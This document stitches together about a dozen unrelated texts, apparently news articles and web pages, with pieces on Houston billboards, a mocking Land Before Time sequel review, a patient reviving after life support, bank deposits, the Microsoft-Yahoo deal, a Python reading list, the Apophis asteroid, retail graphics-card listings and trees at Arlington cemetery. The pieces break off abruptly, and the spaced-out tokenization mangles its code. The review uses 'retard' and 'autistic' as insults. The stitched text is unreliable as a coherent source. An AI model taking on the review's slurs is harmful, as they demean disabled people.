" I think relocation was a complete and total non-starter , " he said .
" It was a horrible idea . "
The 24 large billboards that would get extensions are scattered about the city .
They measure 14 feet by 48 feet .
But they represent just 2 percent of all billboards of that size in Houston , said Andy Icken , deputy director of the city 's Department of Public Works and Engineering .
The deal accomplishes the city 's goal of getting smaller billboards out of residential neighborhoods and scenic districts , Icken said .
" Some would argue the small boards are even more offensive than the large boards , because they 're in underserved neighborhoods and advertise liquor and stuff like that , " he said .
carolyn.feibel@chron.com
Somehow taking place prior to the beginning of time , the original Land Before Time chronicles the story of a plucky dinosaur named Littlefoot and his journey to the Great Valley .
Along the way he meets several dinosaur friends .
Mistakes are made .
Obstacles are overcome .
Eventually they reach the Great Valley and reunite with their indifferent families .
It turns out the world would have been a better place had their Tyrannosaurus pursuer gotten a hold of these cute little baby dinosaurs and chewed them apart .
This might have given children nightmares , but at least they would n’t have had to endure the multitude of heinous sequels .
Each subsequent installment of The Land Before Time is not only an affront to beloved animator Don Bluth ’s original vision , they are an affront to all the previous affronts before them .
By the time you get to the fourth installment , the movies have become so exponentially repulsive that it ’s impossible to simultaneously look at their box covers and believe in God .
Come along with me on this fantastic voyage into atheism .
The Land Before Time II : The Great Valley Adventure
Released : 12/23/94 Everyone ’s delighted with the arrival of a blue “ Sharptooth ” ( which is retard for “ Tyrannosaurus Rex ” ) .
Notice how Littlefoot has completely gotten over the fact that his mother was eaten by a Sharptooth at the beginning of the first Land Before Time .
Suddenly Littlefoot would n’t mind if this new dinosaur went ahead and ate the rest of his family , as long as it benefited VHS sales .
Unfortunately , the only thing the baby Sharptooth consumes is the emotional resonance of the original film .
The Land Before Time III : The Time of the Great Giving
Released : 12/12/95
It is The Time of Great Giving and also The Land Before Time , which is among the dumbest things I ’ve ever heard .
That ’s like naming a movie “ The Last of the Mohicans : The Dawn of Ten Million Additional Mohicans . ”
Also , note how green little Ducky to the left could n’t be more enthusiastic watching Littlefoot lap up some water from a leaf .
What a terrific multidimensional character .
I can only pray that “ The Time of Great Giving ” refers to the distribution of cancer .
The Land Before Time IV : Journey Through The Mists
Released : 12/10/96
I ca n’t tell if this is a story about Littlefoot ’s first girlfriend , or a story about him getting cloned .
It ’s also possible that he gets cloned and then starts dating his blue - eyed doppelganger .
Their “ Journey Through The Mists ” is also pretty ambiguous .
You can tell that the series is already running on fumes , though , because this is only the fourth movie and they ’ve already journeyed back and forth through the mists like 17 times .
The Land Before Time V : The Mysterious Island
Released : 12/9/97 Look , it ’s the return of the blue Sharptooth from the second film !
And he ’s somehow become an even smaller baby .
Do n’t mind the shark in the background .
Littlefoot and his friends are contractually obligated to jump over a shark at least a dozen times per sequel .
Now the shark is just harmlessly darting around the ocean with the same maniacal shit - eating grin seen on every other character .
The Land Before Time VI : The Secret of Saurus Rock
Released : 12/1/98
You ’re probably wondering how that Brachiosaurus managed to get up on that outcropping of rocks , or what possessed him to climb up there in the first place .
Those are n’t the only moronic secrets associated with Saurus Rock .
How about the secret of why Cera suddenly has two colorful babies ?
Or the secret about what Littlefoot ’s staring at with his big creepy eyes ?
If you said , “ Who gives a shit ? , ” congratulations — you ’ve uncovered the secret of Saurus Rock !
The Land Before Time VII : The Stone of Cold Fire
Released : 12/5/00
This installment appears to introduce the subject of meteorites , a tantalizing allusion to the long - awaited extinction of these bastard dinosaur children .
The only problem is that evidently this is a rare “ cold fire ” meteorite — and it also appears to be coming from the earth , not the sky .
This is probably just a movie about a snowball or some other similar horseshit .
Meanwhile , Cera has found the audacity to begin wearing lipstick .
Would it be so difficult to at least kill her ?
The Land Before Time VIII : The Big Freeze
Released : 12/4/01
Is this finally it — is this the weather change that could disrupted the dinosaur ecosystem and finally eliminate Littlefoot and his irritating friends ?
Nope — take one look at all their little jackass smirks .
It ’s as if they ’re saying , “ Haha , assholes , we ’re going to make another 20 movies .
We love ruining your beloved childhood film . ”
Why not just go ahead and dig up our childhood pets and light them on fire ?
The Land Before Time IX : Journey to Big Water
Released : 12/10/02
This movie was shortened from its original title , “ The Journey to Big Water So That Littlefoot Can Dunk His Head into the Water Like an Asshole . ”
Please , hideous mutant yellow - and - purple fish creature , please just grab Littlefoot and keep his head underwater for a few minutes .
Let ’s just end this right now .
Or you could just bob around and clap your fins or whatever the fuck you think you ’re doing .
The Land Before Time X : The Great Longneck Migration
Released : 12/2/02
You ca n’t just take a routine event and preface it with the word “ great ” to make it sound important .
So the longnecks are migrating — who cares ?
It ’s a migration .
They do this every year .
I ca n’t wait for the sequel “ The Land Before Time : The Great Longneck Migration Back to Their Original Location . ”
And look at Ducky pointing the way forward .
Shut up , you little shit , they know where they ’re going .
The Land Before Time XI : Invasion of the Tinysauruses
Released : 1/11/05 Finally , The Land Before Time has the courage to tackle the controversial Tinysaurus invasion of 130,000,000 BC .
Some archeologists claim that the notion of a Tinysaurus invasion is “ historically inaccurate ” and “ mind - bogglingly retarded , ” but The Land Before Time gives us an alterative perspective also worth considering .
I do n’t think it ’s fair that children are taught the Non-Tinysaurus Invasion theory in schools .
There are two conflicting theories and children need to decide for themselves whether the Tinysauruses Invaded or not .
( Hint : they did ) .
The Land Before Time XII : The Great Day of the Flyers
Released : 2/27/07
Wow , just look at all these motherfucking dinosaurs .
If you saw these things in person , which one would you punch first ?
And I do n’t even want to know what that anorexic blue gremlin thing is supposed to be , but the minute he ’s shot will be a moment everyone can cherish .
The Land Before Time XIII : The Wisdom of Friends
Released : 11/27/07
“ All kids will enjoy this adventure ! ” raves made up critic Carolyn Graham from the fictional L.A. Parent .
At this point , there are n’t even any conflicts or mysteries left to resolve — we ’re down to a few autistic friends sharing their moronic wisdom .
Cuba Gooding Jr. rounds out this animated genocide .
Does this take place in The Land Before Time or The Land Before Self - Respect ?
If The Land Before Time wants some actual wisdom , I have plenty to offer .
Why not stop desecrating a cherished film with an ungodly parade of inane sequels ?
Children might be cajoled to sit in front of these abominations , but children are notoriously stupid and will watch anything .
And there ’s a difference between letting your children watch something meaningful and letting them watch these soulless transgressions against humanity .
Was the first Land Before Time even a good a children ’s movie ?
It 's no longer possible to tell because its corpse is so riddled with dickholes .
On a more positive note :
If you ’re a fan of The Land Before Time series , keep your eyes peeled for The Land Before Time XIV , scheduled for release on DVD in 2008 .
The mother who came back from the dead - ten minutes after her life support machine was turned OFF
A mother of two has stunned doctors by apparently coming back from the dead .
Velma Thomas 's heart stopped beating three times and she was clinically brain dead for 17 hours .
Her son had left the hospital to make funeral arrangements , having been told she would not survive .
But ten minutes after her life support system was shut down and doctors were preparing to take her organs for donation , the 59 - year - old woke up .
Miracle : Velma Thomas was clinically brain dead , yet woke up ten minutes after her life support was shut down .
Picture posed by model .
Heart specialist Kevin Eggleston said : ' There are things that as physicians and nurses we can't always explain .
I think this is one of those cases . '
He said Mrs Thomas had no pulse , no heartbeat or brain activity after her admission to hospital .
She had been found unconscious after suffering a heart attack at her home in West Virginia .
While at the Charleston Area Medical Centre she suffered two further heart attacks and was placed on a life support system .
About 25 family members and friends gathered inside the hospital waiting room .
' We just prayed and prayed and prayed , ' said her son Tim , 36 .
' And I came to the conclusion she was n't going to make it .
' I was given confirmation from God to take her off the ventilator and my pastor said the same thing .
I felt a sense of peace that I made the right decision .
Her skin had already started hardening , her hands and toes were curling up .
There was no life there . '
He said after he left the hospital he was called and told she had shown signs of life .
By the time he got to her hospital room , Mrs Thomas was alert and talking .
' She had already asked , " Where 's my son ? " , ' he said .
Dr Eggleston added : ' It 's a miracle . '
Astronomy Picture of the Day Discover the cosmos !
Each day a different image or photograph of our fascinating universe is featured , along with a brief explanation written by a professional astronomer .
2008 May 17
Explanation : Uncomfortably close Typhoon Rammasun ( right ) and 25 million light - year distant galaxy M101 do n't seem to have much in common .
For starters , Rammasun was only a thousand kilometers or so across while M101 ( aka the Pinwheel Galaxy ) spans about 170,000 light - years , making them vastly dissimilar in scale , not to mention the different physical environments that control their formation and development .
But they do look amazingly alike : each with arms exhibiting the shape of a simple and beautiful mathematical curve known as a logarithmic spiral , a spiral whose separation grows in a geometric way with increasing distance from the center .
Also known as the equiangular spiral , growth spiral , and Bernoulli 's spiral or spira mirabilis , this curve 's rich properties have fascinated mathematicians since its discovery by 17th century philosopher Descartes .
Intriguingly , this abstract shape is much more abundant in nature than suggested by the striking visual comparison above .
For example , logarithmic spirals can also describe the tracks of subatomic particles in a bubble chamber , the arrangement of sunflower seeds and , of course , cauliflower .
THE humble deposit is back .
Thanks to the seizure in the wholesale markets , which provided many banks with the money they needed to finance rapid growth during the boom , retail funding is again in heavy demand .
In fact , deposits are not perfect either : they too can suddenly evaporate ( just ask Northern Rock ) and they suffer from a maturity mismatch with long - term assets such as mortgages .
But that is tomorrow 's headache .
“ Banks have rediscovered retail as a funding source , ” says Dick Harryvan , the boss of ING Direct , a leading internet bank .
However , wanting more deposits is very different from winning them , let alone keeping them .
The obvious way to attract new business is to jack up savings rates .
Banks are certainly being more lavish than in the past .
When interest rates last stood at 5 % in Britain , in late 2006 , the top savings rates on offer were more than one percentage point lower than today .
Many of the higher rates are being dangled by cost - effective internet operations .
Kaupthing and Landsbanki , two Icelandic banks that have been trying to increase their deposit - to - loan ratios since a liquidity scare in 2006 , have energetic online savings arms .
For such smaller banks , even modest inflows of new deposits can make a big difference .
It is more difficult to make a substantial difference to the size of deposit bases if they are already well - developed .
The back book of existing customers presents a particularly thorny problem .
Allowing everyone to enjoy higher rates means cannibalising your own profits .
Reserving the best rates for new customers either irritates core depositors or invites them to try and game the system .
One simple savers ' tactic vexing the banks is to withdraw money and then to re-deposit it in order to claim the higher rate .
Even if banks are successful in bringing new money in , two larger questions remain .
The first is whether it will stay .
The deposit business is largely built on the laziness of customers who keep their money in accounts no matter what the rate .
Those who respond to higher rates are also the likeliest to move if a better offer comes along .
ING Direct ran into this problem in Britain before the credit crisis , when a failure to keep pace with rates of other providers led to an exodus of disgruntled depositors .
It now deliberately targets less rate - sensitive customers .
The second question is how much money banks can make if they are having to compete so hard to entice savers .
There are ways to offset the higher costs of deposits .
Some retail banks require depositors to put equal amounts of money into other , more profitable , products .
Others are looking at structured accounts , where the payouts are linked to the performance of equity indices and where risks can be hedged .
But such products are definitely not for the mass market : they may in fact be a route into deposit - taking for the investment banks themselves .
The shape of the yield curve ( the difference between long - and short - term interest rates ) also makes a difference .
ING Direct announced a sharp increase in its interest margin when it released first - quarter results on May 14th , thanks largely to the recent cuts in short - term American interest rates .
But in Europe the yield curve remains inverted ( see chart ) , which drags down profits .
Mr Harryvan reckons that the start - up costs for ING Direct would be around € 2 billion ( $ 3.1 billion ) in today 's interest - rate environment , almost three times the actual figure five years ago .
Deposits may be back in fashion , but they are not for the faddish .
Sayed Perwiz Kambakhsh , 23 , was arrested in 2007 after downloading material from the internet relating to the role of women in Islamic societies .
A primary court in Balkh province said that Kambakhsh had confessed to blasphemy and had to be punished .
The court also threatened to arrest any reporters who protested against Kambakhsh 's sentence .
Kambakhsh , a student at Balkh University and a journalist for Jahan-e Naw ( New World ) , was arrested in October 2007 after material he downloaded was deemed to be offensive to Islam .
Shamsur Rahman , the head of the court , told Reuters news agency : " According to ... the Islamic law , Sayed Perwiz is sentenced to death at the first court .
" However , he will go through three more courts to declare his last punishment , " he said .
' Deeply shocked '
Balkh province 's deputy attorney general , Hafizullah Khaliqyar , warned other journalists that they would be arrested if they attempted to support Kambakhsh .
Kambakhsh did not do anything to justify his being detained or being given this sentence
Reporters Without Borders
But Agence France - Presse reported that journalists were gathering outside the home of the condemned reporter .
The sentence has been welcomed by conservative Islamic clerics in Afghanistan but criticised by international human rights groups .
Global media watchdog Reporters Without Borders said it was " deeply shocked " by the trial and appealed to President Hamid Karzai to intervene " before it is too late " .
In a statement , the group said the trial was " carried out in haste and without any concern for the law or for free expression , which is protected by the constitution " .
" Kambakhsh did not do anything to justify his being detained or being given this sentence . "
Kambakhsh's brother , Sayed Yaqub Ibrahimi , said the verdict was " very unfair " and appealed for help from the international community , reported Reuters .
The software giant , Microsoft , has withdrawn its offer for internet services company Yahoo after the two failed to agree on a price .
The merger of the two companies was designed to tackle a common rival , internet search giant Google .
Now Microsoft says it will go it alone and take on Google all by itself .
Why did Microsoft and Yahoo fail to reach an agreement ?
It simply came down to money .
Yahoo's bosses argued that Microsoft undervalued their company - even though the offer was raised twice in secret negotiations .
Microsoft had originally offered a 62 % premium on Yahoo's share price , based on the day the merger proposal was made .
In the end this bid was improved to a 70 % premium .
That still was n't enough for Yahoo's board and management , who argued that their company was on the road to recovery .
There is a suspicion that Yahoo's bosses simply did n't want to do a deal on principle .
There has never been any love lost between the two companies .
Demanding a very high price for Yahoo may have been a convenient way of not making the deal happen .
Microsoft chief executive Steve Ballmer , for his part , told his employees on Friday that he " knew exactly " what Yahoo was worth and that he would not pay " a dime above " .
What next ?
I thought Microsoft had threatened a hostile takeover if talks failed ?
Yes , that was the original game plan .
Microsoft had warned that it might first lower its offer and then nominate its own candidates to be elected to Yahoo's board at the annual general meeting this summer .
Then it would have been up to Yahoo's shareholders to decide whether they wanted a Microsoft - friendly board in place .
Mr Ballmer now says that this option is " not sensible " , because the long fight would allow Yahoo's bosses to " take steps that would make Yahoo undesirable as an acquisition in the first place " .
Why did they want to get together in the first place ?
I have three words for you : Google , Google , Google .
When the Internet was young , Yahoo was its 800 pound gorilla , and Microsoft - after a false start - managed to acquire silverback status on the web as well .
Google has changed all that .
Not even 10 years old - the birthday candles will be blown this September - Google is the one company that has cracked the secret of how to make big bucks on the internet .
Its search engine rules supreme - achieving a market share of more than 80 % in regions like Europe .
And its search advertising business has turned out to be the world 's largest internet goldmine .
As Google spreads the reach of its business , it seriously undermines Yahoo's and Microsoft 's sources of internet revenue .
Its moves into the field of on - demand software , meanwhile , pose a fundamental threat to Microsoft .
We will probably never know whether a combination of Yahoo and Microsoft would have created a formidable challenge to Google .
But Microsoft 's bosses clearly believed that a combination of the two could have done the trick .
What now for Yahoo ?
Oh dear , poor Yahoo .
If you are a Yahoo shareholder , then brace yourself to lose quite a hefty chunk of your investment when US stock markets open on Monday .
If you work for Yahoo and have stock options , you will be smarting as well .
And if you work for Yahoo's legal team , you may want to get ready for a deluge of lawsuits from enraged shareholders , who have seen a 70 % boost to their investment evaporate .
There are not many companies in the world who can both afford to buy Yahoo and possibly get the approval of competition watchdogs to do so .
Yahoo's top managers , however , will try to fight back , striking a series of alliances - including with Google , especially on advertising - to find new revenue streams .
And what about Microsoft ?
Microsoft dearly wants to catch up with Google , and fast .
Mr Ballmer has now told staff that this is still its ambition .
Together with Yahoo this could have been achieved faster , he says , but he also believes that the world 's richest technology company can do it alone - albeit at a somewhat slower pace .
Some of Microsoft 's shareholders , though , will breathe a sigh of relief .
Not everybody believed that " Microhoo " would have been a success .
Without the albatross Yahoo around its neck , Microsoft 's share price should soar .
E-mail this to a friend Printable version Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
DALLAS  Exxon Mobil ’s chairman and chief executive , Rex W. Tillerson , defeated a shareholder effort on Wednesday to take away one of his jobs at an annual meeting punctuated by a debate of the company ’s policy toward renewable energy and global warming .
The vote was nonbinding and would not have guaranteed a change in company policies had it passed .
But by defeating the challenge , which was supported this year by many members of the Rockefeller family , Mr. Tillerson avoided a serious rebuke to his authority to run the world ’s largest independent oil company .
The resolution to divide the top two positions won 39.5 percent of the vote , about the same as last year .
The vote was announced after a robust debate among shareholders , those who defended management as a great engine for profits and those who argued that a narrow focus on developing oil and gas as energy sources would threaten the global environment and ultimately the company ’s financial health .
Here ’s my essential Python reading list .
The Zen of Python Python Tutorial Python Library Reference Python Reference Manual The Python Cookbook Code Like a Pythonista : Idiomatic Python Functional Programming HOWTO Itertools functions Python library source code What ’s New ?
I ’ve tried to order the items so you can pause or stop reading at any point : at every stage you ’ll have learned about as much possible about Python for the effort you ’ve put in .
The Zen of Python is so short I can include it here in its entirety .
Typing import this in an interpreted session gives a pythonic spin on “ Hello , world ” .
>>> import this The Zen of Python , by Tim Peters Beautiful is better than ugly .
Explicit is better than implicit .
Simple is better than complex .
Complex is better than complicated .
Flat is better than nested .
Sparse is better than dense .
Readability counts .
Special cases are n't special enough to break the rules .
Although practicality beats purity .
Errors should never pass silently .
Unless explicitly silenced .
In the face of ambiguity , refuse the temptation to guess .
There should be one -- and preferably only one -- obvious way to do it .
Although that way may not be obvious at first unless you 're Dutch .
Now is better than never .
Although never is often better than * right * now .
If the implementation is hard to explain , it 's a bad idea .
If the implementation is easy to explain , it may be a good idea .
Namespaces are one honking great idea -- let 's do more of those !
If this does n’t ring true , Python is n’t for you .
Your next stop should be the Python tutorial .
It ’s prominently available at the top of the online documentation tree , with the encouraging prompt :
start here
The latest version ( by which I mean the version corresponding to the most recent stable release of Python ) can be found on the web at http://docs.python.org, but I recommend you find and bookmark the same page from your local Python installation : it will be available offline , pages will load fractionally quicker , and you ’re sure to be reading about the version of Python you ’re actually running .
( Plus , as I ’ll suggest later , it ’s well worth becoming familiar with the contents of your Python installation ) .
And with this tutorial , you ’ll be running code right from the start .
No need to page through syntax definitions or battle with compiler errors .
Since the best way to learn a language is to use it , the tutorial invites you to play with the Python interpreter as you read .
If you have a programming background you can complete the tutorial in a morning and be using Python by the afternoon ; and if you have n’t , Python makes an excellent first language .
A tutorial cannot cover everything , of course , and this one recognises that and points you towards further reading .
The next place to look , it says , is the Python Library Reference .
I agree .
The documentation index suggests you :
keep this under your pillow
It ’s a reference .
It documents use of the standard libraries which came with your Python installation .
I ’m not suggesting you read it from cover to cover but you do need to know where it is and what ’s in it .
You should definitely read the opening sections which cover the built - in objects , functions and types .
I also suggest you get used to accessing the same information from within the Python interpreter using help : it may not be hyperlinked or prettily laid out , but the information is right where you need it .
>>> help ( dict )
Help on class dict in module __builtin__ : class dict ( object ) | dict ( ) -> new empty dictionary .
| dict ( mapping ) -> new dictionary initialized from a mapping object 's | ( key , value ) pairs . | dict ( seq ) -> new dictionary initialized as if via : | d = {} | for k , v in seq : | d[k ] = v | dict ( ** kwargs ) -> new dictionary initialized with the name=value pairs | in the keyword argument list .
For example : dict ( one=1 , two=2 )
The Language Reference claims to be :
for language lawyers
but I ’m not sure that ’s true .
Readable and clear , it offers a great insight into the language ’s design .
Again , you may not want to read it straight through , but I suggest you skim read it now and return to it if you find yourself confused by Python ’s inner workings .
The Python Cookbook is the first slab of treeware I ’m recommending .
Yes , Active State provides a website for the book , which has even more recipes than the book and is well worth a visit , but I ’d say you want the printed edition .
It ’s nicely laid out and provides clear examples of how to use Python for common programming tasks .
Alternative approaches are discussed .
You can dip in to it or read the sections most relevant to your particular domain .
This book teaches you idiomatic Python by example and , remarkably , it actually benefits from being written by a large team of authors .
The editors have done an excellent job .
Incidentally , if you ’re wondering why I claim Python is a high - level language and C++ is n’t , just compare the contents of the Python Cookbook with the contents of its C++ counterpart .
Both books weigh in at ~600 pages , but the C++ one barely gets beyond compiling a program and reading from a file .
This one ’s a presentation David Goodger gave at a conference last year .
I wish he ’d written it and I ’d read it sooner .
If you care about code layout , how you name things etc . but do n’t want to waste time arguing about such things , then you probably want to go with the native language conventions .
Python has a well - defined style and this presentation describes it well , connecting and summarising the contents of several other references .
The next version of the Python documentation ( for versions 2.6 and later ) has a HOWTOs section .
A. M. Kuchling ’s Functional Programming HOWTO is a MUSTREAD , especially for anyone coming from a language with weak support for FP .
Python is far from being a pure functional programming language but features like list comprehensions , iterators , generators , even decorators , draw direct inspiration from functional programming .
If you took my advice and skim - read the Library Reference , you may have skipped past a small module ( mis ? ) filed in the Numeric and Mathematical Modules section .
Now ’s the time to go back and study it .
It wo n’t take long , but these itertools functions are , to me , the epitome of elegance and power .
I use them every day , wish they were promoted to builtins , and most of my interpreted Python sessions start :
>>> from itertools import *
The pure - python modules and test code in your Python installation are packed with good , readable code .
If you ’re looking for example code using a particular module , have a look at that module ’s unit tests .
I ’ve mentioned Python versions a few times in this article .
Although Python takes stability and backwards compatibility seriously , the language has updated every year for as long as I ’ve been using it .
Generally , the changes are backwards compatible so , for example , 2.1 code should work fine in 2.5 , but it ’s important to stay current .
Do you write code like this ?
anag_dict = {} words_fp = open ( " wordlist.txt " , " rt " ) for line in words_fp.readlines ( ) : word = line.strip ( ) .lower ( ) chars = [ ] for ch in word : chars.append(ch ) chars.sort ( ) key = " " .join ( chars ) anag_dict.setdefault(key , [ ] ) .append ( word ) words_fp.close ( ) anagrams = [ ] for words in anag_dict.values ( ) : if len ( words ) > 1 : anagrams.append ( words )
Then you should find out about list comprehensions , the built in sorted function , and defaultdicts — introduced in Python 2.0 , 2.4 , 2.5 respectively !
from collections import defaultdict anag_dict = defaultdict ( list ) with open ( " wordlist.txt " , " rt " ) as words_fp : for line in words_fp : word = line.strip ( ) .lower ( ) key = " " .join ( sorted ( word ) ) anag_dict [ key ] .append ( word ) anagrams = [ words for words in anag_dict.itervalues ( ) if len ( words ) >
1 ]
The with statement , incidentally , appears in 2.6 , which is in alpha as I write this .
Get it now by :
from __future__ import with_statement
Anyway , the point of all this is that A. M. Kuchling writes up what ’s new in each Python revision : think of it as the release notes .
As an example , here ’s What ’s New in Python 2.5 .
Essential reading .
I ’ve only mentioned one book on this reading list .
There are plenty of other decent Python books but I do n’t regard them as essential .
In fact , I ’d rather invest in an excellent general programming title than ( for example ) Programming Python .
Why ?
Well , partly because of the speed at which the language progresses .
Thus the second edition of the Python Cookbook — the single book I regard as essential — did a great job of being 2.4 compliant before 2.4 was even released , which definitely extended its shelf - life ; but it has nothing to say about Python 2.5 features , let alone Python 2.6 and the transition to Python 3.0 .
And partly because the books all too easily become too thick for comfortable use .
Python famously comes with batteries included , but full details of their use belongs online .
I do own a copy of Python Essential Reference by David Beazley .
It ’s the second edition and is now woefully out of date ( covering Python up to version 2.1 ) .
I did get good use out of it , though .
It ’s well designed , beautifully written and laid out , and , weighing in at fewer than 400 pages , comfortable to read and carry .
Somehow it manages ( managed , I should say ) to pack everything in : it ’s concise , and it recognises that the online documentation should be the source of authoritative answers .
Despite this , I have n’t bought the third edition .
Partly because I do n’t really need it , partly because it ’s now a Python point revision or two out of date , and partly because it ’s expanded to 644 pages .
There ’s nothing controversial here .
The Zen of Python should whet your appetite , and the next three items are exactly what you ’ll find at the top of the Python documentation home page .
Others may argue Python in a Nutshell deserves a place , or indeed the hefty Programming Python , and they ’re certainly good books .
I ’d be more interested to find out which non-Python books have improved your Python programming the most .
For myself , I ’ll predictably pick Structure and Interpretation of Computer Programs .
The anagrams puzzle comes from Dave Thomas ’s CodeKata , a nice collection of programming exercises .
The solutions presented here gloss over a few details and make assumptions about the input .
Is “ face ” an anagram of “ café ” , for example ?
For that matter , what about “ cafe ” and “ café ” .
Or “ is n’t ” and “ tins ” ?
What if the word list contains duplicates ?
These issues are n’t particularly hard to solve but they do highlight the dangers of coding up a solution without fully specifying the problem , and indeed the difference between a “ working ” solution and a finished one .
However , I just wanted a short program to highlight advances in recent versions of Python , and in that light , here ’s another variant .
( My thanks to Marius Gedminas for spotting a bug in the code I originally posted here . )
By Paul Rincon
Science reporter , BBC News
The mission aims to tag the asteroid 99942 Apophis
The winning entry , led by SpaceWorks Engineering , will shadow asteroid Apophis for 300 days .
The measurements it takes will be used to refine what is known about the orbit of this 300 m - wide space rock .
Apophis will make a close pass of Earth in 2029 and there is a small but real possibility it could hit in 2036 .
Apophis is n't science fiction , it is n't a blockbuster Hollywood movie ; it is very real
Dan Geraci , The Planetary Society
The idea behind the project was to " tag " Apophis and thereby plot its orbit accurately enough to determine whether it will strike our planet .
The contestants were tasked with designing a mission which would launch , rendezvous and collect enough data in time for governments to decide in 2017 whether or not to mount a mission to deflect the asteroid off its current course .
" We hope the winning entries will catalyse the world 's space agencies to move ahead with designs and missions to protect Earth from potentially dangerous asteroids and comets , " said the Planetary Society 's director of projects , Bruce Betts .
On whether space agencies were doing enough to counter the threat posed by near - Earth asteroids , Mr Betts said : " There is a sense that generally with space agencies there is not enough being done .
Obviously space agencies have a lot on their plate - a lot of things to choose from .
" But in this case , we 're talking about the one truly preventable natural disaster . "
' Long - term focus '
The Foresight spacecraft , designed by Atlanta - based SpaceWorks Engineering , will rendezvous with Apophis and determine its centre of mass .
The probe will then take regular measurements of its position relative to the asteroid .
These measurements will be used to reduce the uncertainties in Apophis ' orbit .
" Apophis is n't science fiction , it is n't a blockbuster Hollywood movie ; it is very real , " said Dan Geraci , the Planetary Society 's board chairman .
" And it 's going to test our ability to keep a long - term focus on something because of the time between now and 2017 , 2029 and 2036 ... this is a chance to use it as an example of how best to prepare and build a plan . "
Those behind the winning design say they hope to launch the craft in 2012 .
At the moment , however , the mission exists only on paper .
Second place in the design competition was taken by a team led by Deimos Space of Madrid , Spain .
Third place went to a group from EADS Astrium in Stevenage , UK .
The Georgia Institute of Technology , based in Atlanta , took first place in the student category , winning $ 5,000 for their design .
Some urgency
Asteroid 99942 Apophis is a primordial relic from the formation of our Solar System .
It is thought to be made largely of rock and circles the Sun in an orbit that brings it close to our planet .
In 2029 , it will approach the Earth within a distance closer than a geostationary satellite - and near enough to be seen with the naked eye .
If the orbiting behemoth passes through a " keyhole " in space measuring several hundred kilometres wide during this pass , it will strike Earth in 2036 .
Earth - based observations might not be sufficient to rule out an impact in 2036 .
Planetary defence advocates say it is imperative to collect data on the asteroid 's path as soon as possible to know whether it will strike our planet or not .
If it is found to be on a collision course , one option governments have is to mount a deflection mission .
This would involve launching a spacecraft able to give the asteroid a nudge to change its orbit .
Leaving this too long would make it impossible to build a spacecraft powerful enough to move the space rock out of harm 's way .
Ideally , say advocates of such a mission , Apophis ' orbit would need to be changed before 2025 to be sure it misses the Earth .
Nasa estimates that if Apophis were to hit Earth , it would explode with as much energy as 400 megatonnes of TNT .
Paul.Rincon-INTERNET@bbc.co.uk
FREE DELIVERY ON ORDERS OVER £ 50
MSI GeForce GTX 980 Ti SEA HAWK 6GB GDDR5 Graphics 1190MHz Core , 1291MHz Boost , 7096 MHz Memory , 2816 CUDA Cores , DVI -I , HDMI , 3 x DPort , PCIe 3.0 , 3 Year Warranty .
only £ 619.98 Buy Now EVGA GeForce GTX 980Ti HYBRID 6GB GDDR5 Graphics 1140MHz Core , 1228 MHz Boost , 7010 MHz Memory , 2816 CUDA Cores , DVI -I , HDMI , 3 x DPort , PCIe 3.0 , 3 Year Warranty only £ 609.98 Buy Now
Samsung 850 Evo Basic 250GB Solid State Hard Drive 2.5 " Basic Kit with Data Migration Software Read Speed : 540MB / Sec , Write Speed : 520MB / Sec , Flash : Samsung 32 layer 3D V- NAND , Controller : Samsung MGX , Buffer : 512MB only £ 72.98
Toshiba 16GB USB 2.0 Flash Drive Capacity : 16GB , Interface : USB 2.0 , Warranty : 5 Years . only £ 3.98 Buy Now Samsung M3 External 1TB 2.5 " HDD USB 3.0 Host Powered Capacity : 1TB , Interface : USB 3.0 , Power : Host Powered , Dimensions ( HDW ) : 38.5 mm x 185 mm x 137 mm , Warranty : 3 Years only £ 44.99 Buy Now
Hundreds of years of human history haunt Arlington National Cemetery .
Atop the hill , alongside a mansion with panoramic views of the national capital below , are the graves of Union dead deliberately dug around what had been General Robert E. Lee ’s home .
Downhill , in Section 60 , where soldiers of the Iraq and Afghanistan wars come to be buried , a wide muddy trench pierced by car tracks is evidence enough of all the transit .
Partway in between burns John F. Kennedy ’s “ eternal flame , ” while a famous post oak — named the Arlington oak — hangs overhead .
Like the Arlington oak , many of the cemetery ’s eight thousand trees , dotting 652 acres , stand inseparable from those buried beneath .
The giant urban oaks , the oldest the three - hundred - year - old white “ Taft oak ” by the former president ’s grave ; the cedar of Lebanon honoring the victims of the bombing of the Marine Corps barracks in Beirut in 1983 ; and the conspicuous flowering dogwoods , the memorial tree most often requested by families , all serve as dynamic headstones for the dead .
Here , human history entangles with the roots of trees .
“ We probably have the finest collection of old trees that you ’ll find in any urban area , certainly the mid-Atlantic , ” says Erik Dihle , division chief for grounds , burial operations , and ceremonial support at Arlington National Cemetery .
A horticulturist by trade , he estimates the cemetery boasts about six hundred trees over age one hundred , with a sizeable number over two hundred , too .
The age of the trees is all the more remarkable , Dihle says , given the constant digging at the cemetery and the corresponding risk of damage to tree roots .
Arlington is home to twenty - eight to thirty funerals each day .
At Arlington , staff block off locations specifically for trees between and among the hundreds of thousands of headstones .
But sometimes tree roots outgrow their allocated spaces — a particularly acute problem when it comes to burying the next of kin in sites that have long been undisturbed .
Dihle has seen dramatic cases , like that of the widow of a World War II soldier who died fifty years after her husband .
In the intervening period , a lovely black cherry tree had grown up and out near the gravesite , the roots spreading laterally underground .
“ Well , what do we do ?
We do n’t bat an eye .
We dig that grave so she can join her husband , ” says Dihle .
But , he adds , “ We ’re going to do the least damage we can to that cherry tree . ”
Stephen Van Hoven , the cemetery ’s urban forester , describes the desperate measures unleashed in those rare cases where roots infringe upon space needed for a gravesite : how landscapers prune the sprawling roots with a circular blade they pierce through the soil , blindly dragging it along the tree ’s extremities , cutting the roots cleanly so they can regenerate .
He tells how landscapers take an extra step with the most vulnerable of trees — angling an “ air spade ” and blasting soil away supersonically — then making selective , precise root cuts before the gravedigger starts digging .
As long as it ’s a clean slice , the tree stands a chance .
But when a backhoe snags and yanks at the roots , leaving them ragged , the tree is less likely to ever recover .
There are post - traumatic treatments too .
Whenever roots threaten to tango with a backhoe , Van Hoven types a note in his master database .
After the funeral procession retreats , the endangered trees receive extra watering , fertilization , or treatment with Cambistat , a chemical that stimulates root growth by rerouting the energy a tree typically devotes to stretching its shoots .
All of this does n’t come up often .
With approximately forty - one hundred burials at Arlington National Cemetery each year , the tension arises just twenty - five times or so .
In his just over twenty - five years at the cemetery , Dihle says he can count on one hand the number of times he thought a tree was situated too close to a burial plot .
And though a Kentucky coffee tree that , until recently , grew in Section 42 is a notable exception , only rarely , Dihle says , do they lose a tree for a grave .
